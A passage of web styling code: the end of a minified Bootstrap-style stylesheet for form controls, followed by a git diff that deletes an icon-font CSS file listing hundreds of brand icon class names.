1px}.custom-control-label::after{position:absolute;top:.25rem;left:-1.5rem;display:block;width:1rem;height:1rem;content:"";background:no-repeat 50%/50% 50%}.custom-checkbox .custom-control-label::before{border-radius:.25rem}.custom-checkbox .custom-control-input:checked~.custom-control-label::after{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath fill='%23fff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26l2.974 2.99L8 2.193z'/%3e%3c/svg%3e")}.custom-checkbox .custom-control-input:indeterminate~.custom-control-label::before{border-color:#1fbbff;background-color:#1fbbff}.custom-checkbox .custom-control-input:indeterminate~.custom-control-label::after{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='4' viewBox='0 0 4 4'%3e%3cpath stroke='%23fff' d='M0 2h4'/%3e%3c/svg%3e")}.custom-checkbox .custom-control-input:disabled:checked~.custom-control-label::before{background-color:rgba(31,187,255,.5)}.custom-checkbox .custom-control-input:disabled:indeterminate~.custom-control-label::before{background-color:rgba(31,187,255,.5)}.custom-radio .custom-control-label::before{border-radius:50%}.custom-radio .custom-control-input:checked~.custom-control-label::after{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%23fff'/%3e%3c/svg%3e")}.custom-radio .custom-control-input:disabled:checked~.custom-control-label::before{background-color:rgba(31,187,255,.5)}.custom-switch{padding-left:2.25rem}.custom-switch .custom-control-label::before{left:-2.25rem;width:1.75rem;pointer-events:all;border-radius:.5rem}.custom-switch .custom-control-label::after{top:calc(0.25rem + 2px);left:calc(-2.25rem + 2px);width:calc(1rem - 4px);height:calc(1rem - 4px);background-color:#adb5bd;border-radius:.5rem;transition:transform .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media(prefers-reduced-motion: reduce){.custom-switch .custom-control-label::after{transition:none}}.custom-switch .custom-control-input:checked~.custom-control-label::after{background-color:#fff;transform:translateX(0.75rem)}.custom-switch .custom-control-input:disabled:checked~.custom-control-label::before{background-color:rgba(31,187,255,.5)}.custom-select{display:inline-block;width:100%;height:calc(1.5em + 0.75rem + 2px);padding:.375rem 1.75rem .375rem .75rem;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;vertical-align:middle;background:#fff url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right .75rem center/8px 10px;border:1px solid #ced4da;border-radius:.25rem;appearance:none}.custom-select:focus{border-color:#9fe2ff;outline:0;box-shadow:0 0 0 .2rem rgba(31,187,255,.25)}.custom-select:focus::-ms-value{color:#495057;background-color:#fff}.custom-select[multiple],.custom-select[size]:not([size="1"]){height:auto;padding-right:.75rem;background-image:none}.custom-select:disabled{color:#6c757d;background-color:#e9ecef}.custom-select::-ms-expand{display:none}.custom-select:-moz-focusring{color:rgba(0,0,0,0);text-shadow:0 0 0 #495057}.custom-select-sm{height:calc(1.5em + 0.5rem + 2px);padding-top:.25rem;padding-bottom:.25rem;padding-left:.5rem;font-size:0.875rem}.custom-select-lg{height:calc(1.5em + 1rem + 2px);padding-top:.5rem;padding-bottom:.5rem;padding-left:1rem;font-size:1.25rem}.custom-file{position:relative;display:inline-block;width:100%;height:calc(1.5em + 0.75rem + 2px);margin-bottom:0}.custom-file-input{position:relative;z-index:2;width:100%;height:calc(1.5em + 0.75rem + 2px);margin:0;opacity:0}.custom-file-input:focus~.custom-file-label{border-color:#9fe2ff;box-shadow:0 0 0 .2rem rgba(31,187,255,.25)}.custom-file-input[disabled]~.custom-file-label,.custom-file-input:disabled~.custom-file-label{background-color:#e9ecef}.custom-file-input:lang(en)~.custom-file-label::after{content:"Browse"}.custom-file-input~.custom-file-label[data-browse]::after{content:attr(data-browse)}.custom-file-label{position:absolute;top:0;right:0;left:0;z-index:1;height:calc(1.5em + 0.75rem + 2px);padding:.375rem .75rem;font-weight:400;line-height:1.5;color:#495057;background-color:#fff;border:1px solid #ced4da;border-radius:.25rem}.custom-file-label::after{position:absolute;top:0;right:0;bottom:0;z-index:3;display:block;height:calc(1.5em + 0.75rem);padding:.375rem .75rem;line-height:1.5;color:#495057;content:"Browse";background-color:#e9ecef;border-left:inherit;border-radius:0 .25rem .25rem 0}.custom-range{width:100%;height:1.4rem;padding:0;background-color:rgba(0,0,0,0);appearance:none}.custom-range:focus{outline:none}.custom-range:focus::-webkit-slider-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(31,187,255,.25)}.custom-range:focus::-moz-range-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(31,187,255,.25)}.custom-range:focus::-ms-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(31,187,255,.25)}.custom-range::-moz-focus-outer{border:0}.custom-range::-webkit-slider-thumb{width:1rem;height:1rem;margin-top:-0.25rem;background-color:#1fbbff;border:0;border-radius:1rem;transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;appearance:none}@media(prefers-reduced-motion: reduce){.custom-range::-webkit-slider-thumb{transition:none}}.custom-range::-webkit-slider-thumb:active{background-color:#d2f1ff}.custom-range::-webkit-slider-runnable-track{width:100%;height:.5rem;color:rgba(0,0,0,0);cursor:pointer;background-color:#dee2e6;border-color:rgba(0,0,0,0);border-radius:1rem}.custom-range::-moz-range-thumb{width:1rem;height:1rem;background-color:#1fbbff;border:0;border-radius:1rem;transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;appearance:none}@media(prefers-reduced-motion: reduce){.custom-range::-moz-range-thumb{transition:none}}.custom-range::-moz-range-thumb:active{background-color:#d2f1ff}.custom-range::-moz-range-track{width:100%;height:.5rem;color:rgba(0,0,0,0);cursor:pointer;background-color:#dee2e6;border-color:rgba(0,0,0,0);border-radius:1rem}.custom-range::-ms-thumb{width:1rem;height:1rem;margin-top:0;margin-right:.2rem;margin-left:.2rem;background-color:#1fbbff;border:0;border-radius:1rem;transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;appearance:none}@media(prefers-reduced-motion: reduce){.custom-range::-ms-thumb{transition:none}}.custom-range::-ms-thumb:active{background-color:#d2f1ff}.custom-range::-ms-track{width:100%;height:.5rem;color:rgba(0,0,0,0);cursor:pointer;background-color:rgba(0,0,0,0);border-color:rgba(0,0,0,0);border-width:.5rem}.custom-range::-ms-fill-lower{background-color:#dee2e6;border-radius:1rem}.custom-range::-ms-fill-upper{margin-right:15px;background-color:#dee2e6;border-radius:1rem}.custom-range:disabled::-webkit-slider-thumb{background-color:#adb5bd}.custom-range:disabled::-webkit-slider-runnable-track{cursor:default}.custom-range:disabled::-moz-range-thumb{background-color:#adb5bd}.custom-range:disabled::-moz-range-track{cursor:default}.custom-range:disabled::-ms-thumb{background-color:#adb5bd}.custom-control-label::before,.custom-file-label,.custom-select{transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media(prefers-reduced-motion: reduce){.custom-control-label::before,.custom-file-label,.custom-select{transition:none}}.input-group{position:relative;display:flex;flex-wrap:wrap;align-items:stretch;width:100%}.input-group>.form-control,.input-group>.form-control-plaintext,.input-group>.custom-select,.input-group>.custom-file{position:relative;flex:1 1 auto;width:1%;min-width:0;margin-bottom:0}.input-group>.form-control+.form-control,.input-group>.form-control+.custom-select,.input-group>.form-control+.custom-file,.input-group>.form-control-plaintext+.form-control,.input-group>.form-control-plaintext+.custom-select,.input-group>.form-control-plaintext+.custom-file,.input-group>.custom-select+.form-control,.input-group>.custom-select+.custom-select,.input-group>.custom-select+.custom-file,.input-group>.custom-file+.form-control,.input-group>.custom-file+.custom-select,.input-group>.custom-file+.custom-file{margin-left:-1px}.input-group>.form-control:focus,.input-group>.custom-select:focus,.input-group>.custom-file .custom-file-input:focus~.custom-file-label{z-index:3}.input-group>.custom-file .custom-file-input:focus{z-index:4}.input-group>.form-control:not(:last-child),.input-group>.custom-select:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.input-group>.form-control:not(:first-child),.input-group>.custom-select:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.input-group>.custom-file{display:flex;align-items:center}.input-group>.custom-file:not(:last-child) .custom-file-label,.input-group>.custom-file:not(:last-child) .custom-file-label::after{border-top-right-radius:0;border-bottom-right-radius:0}.input-group>.custom-file:not(:first-child) .custom-file-label{border-top-left-radius:0;border-bottom-left-radius:0}.input-group-prepend,.input-group-append{display:flex}.input-group-prepend .btn,.input-group-append .btn{position:relative;z-index:2}.input-group-prepend .btn:focus,.input-group-append .btn:focus{z-index:3}.input-group-prepend .btn+.btn,.input-group-prepend .btn+.input-group-text,.input-group-prepend .input-group-text+.input-group-text,.input-group-prepend .input-group-text+.btn,.input-group-append .btn+.btn,.input-group-append .btn+.input-group-text,.input-group-append .input-group-text+.input-group-text,.input-group-append .input-group-text+.btn{margin-left:-1px}.input-group-prepend{margin-right:-1px}.input-group-append{margin-left:-1px}.input-group-text{display:flex;align-items:center;padding:.375rem .75rem;margin-bottom:0;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;text-align:center;white-space:nowrap;background-color:#e9ecef;border:1px solid #ced4da;border-radius:.25rem}.input-group-text input[type=radio],.input-group-text input[type=checkbox]{margin-top:0}.input-group-lg>.form-control:not(textarea),.input-group-lg>.custom-select{height:calc(1.5em + 1rem + 2px)}.input-group-lg>.form-control,.input-group-lg>.custom-select,.input-group-lg>.input-group-prepend>.input-group-text,.input-group-lg>.input-group-append>.input-group-text,.input-group-lg>.input-group-prepend>.btn,.input-group-lg>.input-group-append>.btn{padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}.input-group-sm>.form-control:not(textarea),.input-group-sm>.custom-select{height:calc(1.5em + 0.5rem + 2px)}.input-group-sm>.form-control,.input-group-sm>.custom-select,.input-group-sm>.input-group-prepend>.input-group-text,.input-group-sm>.input-group-append>.input-group-text,.input-group-sm>.input-group-prepend>.btn,.input-group-sm>.input-group-append>.btn{padding:.25rem .5rem;font-size:0.875rem;line-height:1.5;border-radius:.2rem}.input-group-lg>.custom-select,.input-group-sm>.custom-select{padding-right:1.75rem}.input-group>.input-group-prepend>.btn,.input-group>.input-group-prepend>.input-group-text,.input-group>.input-group-append:not(:last-child)>.btn,.input-group>.input-group-append:not(:last-child)>.input-group-text,.input-group>.input-group-append:last-child>.btn:not(:last-child):not(.dropdown-toggle),.input-group>.input-group-append:last-child>.input-group-text:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.input-group>.input-group-append>.btn,.input-group>.input-group-append>.input-group-text,.input-group>.input-group-prepend:not(:first-child)>.btn,.input-group>.input-group-prepend:not(:first-child)>.input-group-text,.input-group>.input-group-prepend:first-child>.btn:not(:first-child),.input-group>.input-group-prepend:first-child>.input-group-text:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}input:checked+.slider{background-color:#1fbbff}input:focus+.slider{box-shadow:0 0 1px #1fbbff}.nav-tabs .nav-link.active{border-bottom:4px solid #1fbbff}.btn-outline-primary:not(:disabled):not(.disabled):active,.btn-outline-primary:not(:disabled):not(.disabled).active,.show>.btn-outline-primary.dropdown-toggle,.btn-outline-primary:hover,.btn-outline-primary:not(:disabled):not(.disabled):active,.btn-outline-primary:not(:disabled):not(.disabled).active,.show>.btn-outline-primary.dropdown-toggle,.btn-outline-primary:hover{color:#1fbbff;background-color:#fff !important}/*# sourceMappingURL=bootstrap.publicmin.css.map */ diff --git a/old/css/iconsbio.css b/old/css/iconsbio.css deleted file mode 100644 index 3fe4470..0000000 --- a/old/css/iconsbio.css +++ /dev/null @@ -1,5288 +0,0 @@ -/* - Icon Font: iconsbio1 -*/ - -@font-face { - font-family: "iconsbio1"; - src: url("../fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.eot"); - src: url("../fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.eot#iefix") format("embedded-opentype"), - url("../fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.woff2") format("woff2"), - url("../fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.woff") format("woff"), - url("../fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.ttf") format("truetype"), - url("../images/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.svg#iconsbio1") format("svg"); - font-weight: normal; - font-style: normal; -} - -@media screen and (-webkit-min-device-pixel-ratio:0) { - @font-face { - font-family: "iconsbio1"; - src: url("../images/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.svg#iconsbio1") format("svg"); - } -} - -[data-icon]:before { content: attr(data-icon); } - -[data-icon]:before, -.ibio-17live:before, -.ibio-19-69:before, -.ibio-21buttons:before, -.ibio-42group:before, -.ibio-4thewords:before, -.ibio-500px:before, -.ibio-54-thrones:before, -.ibio-7digital:before, -.ibio-9gag:before, -.ibio-ELO7:before, -.ibio-aakuluk-music:before, -.ibio-aapf:before, -.ibio-abema:before, -.ibio-abillion:before, -.ibio-abkco:before, -.ibio-academia:before, -.ibio-acast:before, -.ibio-accredible:before, -.ibio-aclu:before, -.ibio-acqua-di-parma:before, -.ibio-act-music:before, -.ibio-actblue:before, -.ibio-action-records:before, -.ibio-actors-access:before, -.ibio-acuity:before, -.ibio-ad-ticket:before, -.ibio-ad93:before, -.ibio-addictech:before, -.ibio-adidas:before, -.ibio-adlibris:before, -.ibio-adobe:before, -.ibio-adobe-acrobat:before, -.ibio-adobe-aftereffects:before, -.ibio-adobe-illustrator:before, -.ibio-adobe-indesign:before, -.ibio-adobe-photoshop:before, -.ibio-adobe-premiere:before, -.ibio-adobecommerce:before, -.ibio-adsr:before, -.ibio-adwoa-beauty:before, -.ibio-aeg-presents:before, -.ibio-aerin:before, -.ibio-affiliatetheme:before, -.ibio-afm-records-shop:before, -.ibio-afrocharts:before, -.ibio-aftown:before, -.ibio-aftr-hrs:before, -.ibio-airbit:before, -.ibio-airbnb:before, -.ibio-airgigs:before, -.ibio-airnfts:before, -.ibio-airtable:before, -.ibio-akazoo:before, -.ibio-album:before, -.ibio-alda-music:before, -.ibio-aldo:before, -.ibio-alfredmusic:before, -.ibio-algenist:before, -.ibio-algolia:before, -.ibio-alibaba:before, -.ibio-aliexpress:before, -.ibio-alipay:before, -.ibio-alison:before, -.ibio-all-in-merch:before, -.ibio-all4:before, -.ibio-allegro:before, -.ibio-allmusic:before, -.ibio-alphauniverse:before, -.ibio-alpyn-beauty:before, -.ibio-alterna-haircare:before, -.ibio-altspacevr:before, -.ibio-amazon:before, -.ibio-amazon-creditcard:before, -.ibio-amazonchime:before, -.ibio-amazonmusic:before, -.ibio-amazonpay:before, -.ibio-amazonprimevideo:before, -.ibio-amazonsmile:before, -.ibio-amazonwebservices:before, -.ibio-american-eagle:before, -.ibio-amex:before, -.ibio-amika:before, -.ibio-amilia:before, -.ibio-amino:before, -.ibio-amorepacific:before, -.ibio-amplifyd:before, -.ibio-anchor:before, -.ibio-anchorfm:before, -.ibio-android:before, -.ibio-angellist:before, -.ibio-anghami:before, -.ibio-angrycreative:before, -.ibio-angular:before, -.ibio-ani-mu-mo:before, -.ibio-anidb:before, -.ibio-anilist:before, -.ibio-animal-music:before, -.ibio-animaru:before, -.ibio-animate-international:before, -.ibio-animatebookstore:before, -.ibio-animax:before, -.ibio-anime-hodai:before, -.ibio-animega:before, -.ibio-aniplexplus:before, -.ibio-aniuta:before, -.ibio-antonym:before, -.ibio-ao3:before, -.ibio-aoty:before, -.ibio-aparte-label:before, -.ibio-apple:before, -.ibio-apple-news:before, -.ibio-applemusic:before, -.ibio-applepay:before, -.ibio-applepay-cc:before, -.ibio-applepodcast:before, -.ibio-appstore:before, -.ibio-aquis:before, -.ibio-archiproducts:before, -.ibio-ardent-studios:before, -.ibio-arkiv-music:before, -.ibio-armani:before, -.ibio-armani-beauty:before, -.ibio-armazem-do-vinil:before, -.ibio-art-fight:before, -.ibio-art-limited:before, -.ibio-artfol:before, -.ibio-artis:before, -.ibio-artist-couture:before, -.ibio-artist-first:before, -.ibio-artists-united-collective:before, -.ibio-artiva:before, -.ibio-artstation:before, -.ibio-artsy:before, -.ibio-asda:before, -.ibio-asianfanfics:before, -.ibio-asics:before, -.ibio-askfm:before, -.ibio-asos:before, -.ibio-assai-records:before, -.ibio-astralwerks:before, -.ibio-atelier-cologne:before, -.ibio-athr-beauty:before, -.ibio-atlassian:before, -.ibio-atma-classique:before, -.ibio-atmosfy:before, -.ibio-atomic-fire-records:before, -.ibio-auchan:before, -.ibio-audacy:before, -.ibio-audemars-piguet:before, -.ibio-audible:before, -.ibio-audio-boom:before, -.ibio-audio-center:before, -.ibio-audio-now:before, -.ibio-audiofile-magazine:before, -.ibio-audioglobe:before, -.ibio-audiojungle:before, -.ibio-audiolibrix:before, -.ibio-audiolith-shop:before, -.ibio-audiomack:before, -.ibio-audiomania:before, -.ibio-audioteka:before, -.ibio-audite:before, -.ibio-audius:before, -.ibio-auguri-productions:before, -.ibio-augustinus-bader:before, -.ibio-autoprefixer:before, -.ibio-average-joes-entertainment:before, -.ibio-avex-taiwan-e-shop:before, -.ibio-avvo:before, -.ibio-axs:before, -.ibio-azure-devops:before, -.ibio-bImobject:before, -.ibio-back-to-black-vinyl:before, -.ibio-backloggd:before, -.ibio-backstage:before, -.ibio-backstage-rock-shop:before, -.ibio-bad-time-records:before, -.ibio-badlands-records:before, -.ibio-badoo:before, -.ibio-baidu:before, -.ibio-balley-records:before, -.ibio-banana-republic:before, -.ibio-band-zoogle:before, -.ibio-bandcamp:before, -.ibio-bandlab:before, -.ibio-bandsintown:before, -.ibio-banquet-records:before, -.ibio-bareminerals:before, -.ibio-barnesandnoble:before, -.ibio-battlenet:before, -.ibio-bbc:before, -.ibio-bbc-iplayer:before, -.ibio-bbe-records:before, -.ibio-bbstore:before, -.ibio-bcore-disc:before, -.ibio-bcstore:before, -.ibio-bda-store:before, -.ibio-bear-tree-records:before, -.ibio-beatdown-records:before, -.ibio-beatno:before, -.ibio-beatrec:before, -.ibio-beatstars:before, -.ibio-beautybio:before, -.ibio-beautyblender:before, -.ibio-because-music:before, -.ibio-behance:before, -.ibio-being-giza-studio:before, -.ibio-benefit:before, -.ibio-berdoues:before, -.ibio-bereal:before, -.ibio-betalist:before, -.ibio-bethesda:before, -.ibio-better-not-younger:before, -.ibio-bfi-player:before, -.ibio-bgmc-library:before, -.ibio-bibliotekdk:before, -.ibio-biccamera:before, -.ibio-big-ac-records:before, -.ibio-big-love-records:before, -.ibio-big-machine-label-group:before, -.ibio-bigcartel:before, -.ibio-bigo:before, -.ibio-bilibili:before, -.ibio-bio-ionic:before, -.ibio-biossance:before, -.ibio-bitbucket:before, -.ibio-bitclout:before, -.ibio-bitcoin:before, -.ibio-bite-beauty:before, -.ibio-bity:before, -.ibio-black-circle-records:before, -.ibio-black-city-records:before, -.ibio-black-screen-records:before, -.ibio-black-up:before, -.ibio-blackberry:before, -.ibio-bleep:before, -.ibio-blendio:before, -.ibio-blibli:before, -.ibio-blinc:before, -.ibio-block-opera:before, -.ibio-blogger:before, -.ibio-bmg-music-store:before, -.ibio-boardgamegeek:before, -.ibio-bobbi-brown:before, -.ibio-bogner:before, -.ibio-boiler-room-records:before, -.ibio-bolachao-discos:before, -.ibio-bolcom:before, -.ibio-boldorg:before, -.ibio-bonnier-books-uk:before, -.ibio-bonsound:before, -.ibio-boo-boo-records:before, -.ibio-book2look:before, -.ibio-bookbeat:before, -.ibio-bookbub:before, -.ibio-bookingcom:before, -.ibio-booklikeaboss:before, -.ibio-books-a-million:before, -.ibio-bookshop:before, -.ibio-booksy:before, -.ibio-boomkat:before, -.ibio-boomplay:before, -.ibio-boosty:before, -.ibio-booth:before, -.ibio-bootstrap:before, -.ibio-boscia:before, -.ibio-box:before, -.ibio-brain-magazine:before, -.ibio-bread-beauty-supply:before, -.ibio-break-world-records:before, -.ibio-breaker:before, -.ibio-breguet:before, -.ibio-brilliant:before, -.ibio-briogeo:before, -.ibio-brittanys-record-shop:before, -.ibio-broadwayhd:before, -.ibio-brunello-cucinelli:before, -.ibio-bubblehouse:before, -.ibio-buddie-beatz:before, -.ibio-buecherde:before, -.ibio-buffer:before, -.ibio-bugs:before, -.ibio-bukalapak:before, -.ibio-bull-city-records:before, -.ibio-bumble:before, -.ibio-bumble-and-bumble:before, -.ibio-bungie:before, -.ibio-bunkyodo:before, -.ibio-burberry:before, -.ibio-burning-shed:before, -.ibio-buxom:before, -.ibio-buy-music-club:before, -.ibio-buymeacoffee:before, -.ibio-buysellads:before, -.ibio-buywell-music:before, -.ibio-buzzlyart:before, -.ibio-buzzsprout:before, -.ibio-by-rosie-jane:before, -.ibio-byu-music-store:before, -.ibio-c-and-a:before, -.ibio-cactus-music:before, -.ibio-calendarhero:before, -.ibio-calendly:before, -.ibio-caliray:before, -.ibio-callaway-books:before, -.ibio-caller-tunes:before, -.ibio-calvin-klein:before, -.ibio-cameo:before, -.ibio-cameron-records:before, -.ibio-canadian-music-centre:before, -.ibio-canal-digital-go:before, -.ibio-canal-vod-france:before, -.ibio-canva:before, -.ibio-capri-blue:before, -.ibio-captured-tracks:before, -.ibio-carbonmade:before, -.ibio-cargo-records:before, -.ibio-carolina-herrera:before, -.ibio-carousell:before, -.ibio-carrd:before, -.ibio-carrefour-music:before, -.ibio-cartier:before, -.ibio-cashapp:before, -.ibio-castbox:before, -.ibio-castingcallclub:before, -.ibio-castro:before, -.ibio-caudalie:before, -.ibio-cavalli:before, -.ibio-cd:before, -.ibio-cd-hal:before, -.ibio-cd-v-podarok:before, -.ibio-cd-warehouse:before, -.ibio-cdgo:before, -.ibio-cdiscount:before, -.ibio-cdjapan:before, -.ibio-cdoncom:before, -.ibio-cedech:before, -.ibio-cedeterija:before, -.ibio-cedille-records:before, -.ibio-cellcard-music:before, -.ibio-centercode:before, -.ibio-centos:before, -.ibio-century-media:before, -.ibio-cgsociety:before, -.ibio-chanel:before, -.ibio-charlotte-tilbury:before, -.ibio-cherry-red-records:before, -.ibio-chess:before, -.ibio-chili-tv:before, -.ibio-chimera-music:before, -.ibio-chirpbooks:before, -.ibio-chopard:before, -.ibio-chow-tai-fook:before, -.ibio-christian-louboutin:before, -.ibio-christophe-robin:before, -.ibio-chrome:before, -.ibio-chromecast:before, -.ibio-chuffed:before, -.ibio-ciate-london:before, -.ibio-cinebuzz:before, -.ibio-cinema-live:before, -.ibio-cinema-secrets:before, -.ibio-cinemaxx:before, -.ibio-cineplex-store:before, -.ibio-cinepolis-klic:before, -.ibio-cineworld:before, -.ibio-claddagh-records:before, -.ibio-clapper:before, -.ibio-clarins:before, -.ibio-clarity-records:before, -.ibio-claromusica:before, -.ibio-clash:before, -.ibio-classic-album-sunday:before, -.ibio-classic-fm:before, -.ibio-classics-direct:before, -.ibio-classics-to-go:before, -.ibio-clean-reserve:before, -.ibio-cleopatra-records:before, -.ibio-clickup:before, -.ibio-clinique:before, -.ibio-clippingsme:before, -.ibio-cloudflare:before, -.ibio-cloudscale:before, -.ibio-cloudsmith:before, -.ibio-cloudversify:before, -.ibio-clube-hurb:before, -.ibio-clubhouse:before, -.ibio-clyp:before, -.ibio-cm-distro:before, -.ibio-cmore:before, -.ibio-cmplid:before, -.ibio-cntct-recordings:before, -.ibio-coach:before, -.ibio-coconuts-disk:before, -.ibio-codecademy:before, -.ibio-codepen:before, -.ibio-codewars:before, -.ibio-codiepie:before, -.ibio-coinbase:before, -.ibio-colab55:before, -.ibio-collectomania:before, -.ibio-collectors-choice-music:before, -.ibio-color-of-change:before, -.ibio-color-wow:before, -.ibio-columbia-records:before, -.ibio-comeback-vinyl:before, -.ibio-comic-relief:before, -.ibio-communion-music:before, -.ibio-community:before, -.ibio-compass-records:before, -.ibio-confluence:before, -.ibio-constantcontact:before, -.ibio-contactform:before, -.ibio-contao:before, -.ibio-contently:before, -.ibio-cooking-vinyl-australia:before, -.ibio-cookpad:before, -.ibio-coola:before, -.ibio-coroflot:before, -.ibio-cosmopayment:before, -.ibio-costarastrology:before, -.ibio-cottonbureau:before, -.ibio-coub:before, -.ibio-couchsurfing:before, -.ibio-coursera:before, -.ibio-coverfly:before, -.ibio-cpanel:before, -.ibio-craft-recordings:before, -.ibio-crank-in-video:before, -.ibio-crash-records:before, -.ibio-creativecommons:before, -.ibio-creativecommons-attribution:before, -.ibio-creativecommons-cc0:before, -.ibio-creativecommons-noderivativeworks:before, -.ibio-creativecommons-noncommercial:before, -.ibio-creativecommons-noncommercial-euro:before, -.ibio-creativecommons-noncommercial-yen:before, -.ibio-creativecommons-publicdomain:before, -.ibio-creativecommons-remix:before, -.ibio-creativecommons-sampling:before, -.ibio-creativecommons-samplingplus:before, -.ibio-creativecommons-sharealike:before, -.ibio-creatively:before, -.ibio-creatively-old:before, -.ibio-credly:before, -.ibio-creep-records-store:before, -.ibio-criminal-records:before, -.ibio-criticalrole:before, -.ibio-crunchbase:before, -.ibio-crunchyroll:before, -.ibio-csgo:before, -.ibio-css3:before, -.ibio-cult-records:before, -.ibio-cults3d:before, -.ibio-curioos:before, -.ibio-curiouscat:before, -.ibio-curzon:before, -.ibio-cuttlefish:before, -.ibio-cyber-anime-store:before, -.ibio-daddykool-records:before, -.ibio-dae:before, -.ibio-dagger-records:before, -.ibio-dailymotion:before, -.ibio-damdam:before, -.ibio-dandd:before, -.ibio-danessa-myricks-beauty:before, -.ibio-daptone-records:before, -.ibio-dark-descent-records:before, -.ibio-dark-side-ink-division:before, -.ibio-dark-tunes:before, -.ibio-darklight-recordings:before, -.ibio-darkside-records:before, -.ibio-dashcube:before, -.ibio-databeats:before, -.ibio-datacamp:before, -.ibio-datpiff:before, -.ibio-dbs-sounds:before, -.ibio-dd-beyond:before, -.ibio-dearborn-music:before, -.ibio-deborah-lippmann:before, -.ibio-decitre:before, -.ibio-decks-records:before, -.ibio-deedo:before, -.ibio-deejayde:before, -.ibio-deejaydeadde:before, -.ibio-deewee:before, -.ibio-deezer:before, -.ibio-depop:before, -.ibio-desigual:before, -.ibio-deskpro:before, -.ibio-dev:before, -.ibio-devacurl:before, -.ibio-deviantart:before, -.ibio-dfa-records:before, -.ibio-dgtl:before, -.ibio-dhl:before, -.ibio-diaspora:before, -.ibio-dibujando:before, -.ibio-diesel:before, -.ibio-difymusic:before, -.ibio-digelius:before, -.ibio-digg:before, -.ibio-diggers-factory:before, -.ibio-digital-virgo:before, -.ibio-digitalocean:before, -.ibio-digitick:before, -.ibio-digiturk:before, -.ibio-digster:before, -.ibio-dinersclub:before, -.ibio-dior:before, -.ibio-discogs:before, -.ibio-discord:before, -.ibio-discourse:before, -.ibio-discover-cc:before, -.ibio-disney:before, -.ibio-disneyplus:before, -.ibio-displate:before, -.ibio-disqus:before, -.ibio-distrokid:before, -.ibio-dlive:before, -.ibio-dmm:before, -.ibio-dochub:before, -.ibio-docker:before, -.ibio-doctoralia:before, -.ibio-dogwoof:before, -.ibio-dolce-gabbana:before, -.ibio-domainau:before, -.ibio-dominique-cosmetics:before, -.ibio-don-giovanni-records:before, -.ibio-donation:before, -.ibio-donna-karan:before, -.ibio-donorbox:before, -.ibio-doodle:before, -.ibio-doterra:before, -.ibio-douban:before, -.ibio-douyin:before, -.ibio-dphue:before, -.ibio-dr-barbara-sturm:before, -.ibio-dr-brandt:before, -.ibio-dr-dennis-gross:before, -.ibio-dr-jart:before, -.ibio-dr-lara-devgan:before, -.ibio-dr-lyd:before, -.ibio-dr-tv:before, -.ibio-dr-zenovia:before, -.ibio-draft2digital:before, -.ibio-drag-city:before, -.ibio-drdk:before, -.ibio-dreamwidth:before, -.ibio-dribbble:before, -.ibio-dropbox:before, -.ibio-drunk-elephant:before, -.ibio-drupal:before, -.ibio-drybar:before, -.ibio-dualtone-store:before, -.ibio-dublin-vinyl:before, -.ibio-dubray:before, -.ibio-duo:before, -.ibio-duolingo:before, -.ibio-duophonic-store:before, -.ibio-dvd:before, -.ibio-dvd-best:before, -.ibio-dvdmaxpl:before, -.ibio-dvdoo:before, -.ibio-dwango:before, -.ibio-dyalog:before, -.ibio-dyson:before, -.ibio-eadem:before, -.ibio-earlybirds:before, -.ibio-earmusic:before, -.ibio-easy-eye-sound:before, -.ibio-easy-star-records:before, -.ibio-easy-street-records:before, -.ibio-ebay:before, -.ibio-ebillet:before, -.ibio-ebookde:before, -.ibio-ebuzzie:before, -.ibio-ecency:before, -.ibio-echos-record-bar:before, -.ibio-eclassical:before, -.ibio-edel-ag:before, -.ibio-edge-browser:before, -.ibio-edx:before, -.ibio-eel-pie-records:before, -.ibio-egg-hunt-records:before, -.ibio-ego-music:before, -.ibio-eight-bob:before, -.ibio-el-corte-ingles:before, -.ibio-el-dromedario-records:before, -.ibio-elementio:before, -.ibio-elementor:before, -.ibio-elevate-berlin:before, -.ibio-elevate-records-store:before, -.ibio-elgiganten:before, -.ibio-elie-saab:before, -.ibio-elie-taharie:before, -.ibio-ellis-brooklyn:before, -.ibio-ello:before, -.ibio-elsewhere-records:before, -.ibio-elusive-disc:before, -.ibio-ember:before, -.ibio-emp-online:before, -.ibio-empikcom:before, -.ibio-empire-distribution:before, -.ibio-end-hit-records:before, -.ibio-enjoei:before, -.ibio-envira-gallery:before, -.ibio-epal:before, -.ibio-epicgames:before, -.ibio-epidemic-sound:before, -.ibio-epistroph:before, -.ibio-epitaph-store:before, -.ibio-equal-justice-initiative:before, -.ibio-erased-tapes:before, -.ibio-ereolen:before, 